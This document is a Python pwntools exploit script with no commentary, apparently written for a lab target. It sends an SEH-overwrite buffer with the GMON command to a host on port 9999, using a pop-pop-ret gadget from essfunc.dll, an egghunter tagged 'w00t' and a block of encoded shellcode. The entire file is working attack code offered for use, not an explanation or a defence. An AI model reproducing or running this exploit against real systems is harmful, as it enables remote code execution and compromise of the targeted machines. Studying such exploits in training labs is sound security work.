from pwn import *

host = "192.168.1.37"
port = 9999

crashcmd = "GMON /.:/" 
sehoffset = 3528

# 0x6250172b : pop edi # pop ebp # ret  | asciiprint,ascii {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: >
jmp = "\x4c\x4c\x77\x06"
jmp2 = "\x54\x58\x66\x05\xB3\x05\xFF\xD0"
seh = "\x2b\x17\x50\x62"

egghunter = ("\x66\x8c\xcb\x80\xfb\x23\x75\x08\x31\xdb\x53\x53\x53\x53\xb3\xc0"
"\x66\x81\xca\xff\x0f\x42\x52\x80\xfb\xc0\x74\x19\x6a\x02\x58\xcd"
"\x2e\x5a\x3c\x05\x74\xea\xb8"
"\x77\x30\x30\x74"  # tag w00t
"\x89\xd7\xaf\x75\xe5\xaf\x75\xe2\xff\xe7\x6a\x26\x58\x31\xc9\x89"
"\xe2\x64\xff\x13\x5e\x5a\xeb\xdf")


shellcode =  b""
shellcode += b"\xdb\xd0\xd9\x74\x24\xf4\x58\xba\x67\x83\x86"
shellcode += b"\xaa\x33\xc9\xb1\x52\x83\xc0\x04\x31\x50\x13"
shellcode += b"\x03\x37\x90\x64\x5f\x4b\x7e\xea\xa0\xb3\x7f"
shellcode += b"\x8b\x29\x56\x4e\x8b\x4e\x13\xe1\x3b\x04\x71"
shellcode += b"\x0e\xb7\x48\x61\x85\xb5\x44\x86\x2e\x73\xb3"
shellcode += b"\xa9\xaf\x28\x87\xa8\x33\x33\xd4\x0a\x0d\xfc"
shellcode += b"\x29\x4b\x4a\xe1\xc0\x19\x03\x6d\x76\x8d\x20"
shellcode += b"\x3b\x4b\x26\x7a\xad\xcb\xdb\xcb\xcc\xfa\x4a"
shellcode += b"\x47\x97\xdc\x6d\x84\xa3\x54\x75\xc9\x8e\x2f"
shellcode += b"\x0e\x39\x64\xae\xc6\x73\x85\x1d\x27\xbc\x74"
shellcode += b"\x5f\x60\x7b\x67\x2a\x98\x7f\x1a\x2d\x5f\xfd"
shellcode += b"\xc0\xb8\x7b\xa5\x83\x1b\xa7\x57\x47\xfd\x2c"
shellcode += b"\x5b\x2c\x89\x6a\x78\xb3\x5e\x01\x84\x38\x61"
shellcode += b"\xc5\x0c\x7a\x46\xc1\x55\xd8\xe7\x50\x30\x8f"
shellcode += b"\x18\x82\x9b\x70\xbd\xc9\x36\x64\xcc\x90\x5e"
shellcode += b"\x49\xfd\x2a\x9f\xc5\x76\x59\xad\x4a\x2d\xf5"
shellcode += b"\x9d\x03\xeb\x02\xe1\x39\x4b\x9c\x1c\xc2\xac"
shellcode += b"\xb5\xda\x96\xfc\xad\xcb\x96\x96\x2d\xf3\x42"
shellcode += b"\x38\x7d\x5b\x3d\xf9\x2d\x1b\xed\x91\x27\x94"
shellcode += b"\xd2\x82\x48\x7e\x7b\x28\xb3\xe9\x44\x05\xba"
shellcode += b"\xcf\x2c\x54\xbc\x0e\x16\xd1\x5a\x7a\x78\xb4"
shellcode += b"\xf5\x13\xe1\x9d\x8d\x82\xee\x0b\xe8\x85\x65"
shellcode += b"\xb8\x0d\x4b\x8e\xb5\x1d\x3c\x7e\x80\x7f\xeb"
shellcode += b"\x81\x3e\x17\x77\x13\xa5\xe7\xfe\x08\x72\xb0"
shellcode += b"\x57\xfe\x8b\x54\x4a\x59\x22\x4a\x97\x3f\x0d"
shellcode += b"\xce\x4c\xfc\x90\xcf\x01\xb8\xb6\xdf\xdf\x41"
shellcode += b"\xf3\x8b\x8f\x17\xad\x65\x76\xce\x1f\xdf\x20"
shellcode += b"\xbd\xc9\xb7\xb5\x8d\xc9\xc1\xb9\xdb\xbf\x2d"
shellcode += b"\x0b\xb2\xf9\x52\xa4\x52\x0e\x2b\xd8\xc2\xf1"
shellcode += b"\xe6\x58\xe2\x13\x22\x95\x8b\x8d\xa7\x14\xd6"
shellcode += b"\x2d\x12\x5a\xef\xad\x96\x23\x14\xad\xd3\x26"
shellcode += b"\x50\x69\x08\x5b\xc9\x1c\x2e\xc8\xea\x34"

buffer = crashcmd
buffer += "A" * 10 + egghunter 
buffer += "\x90" * 32
buffer += "t00wt00w" + shellcode + "A" * (sehoffset - len(crashcmd)-len(jmp)-18-len(egghunter)-32-len(shellcode))
buffer += jmp + seh + "\x90" * 4 + jmp2
buffer += "\x90" * (5012 - len(buffer)) + "\r\n"

s = remote(host, port)
s.send(buffer)
s.close()
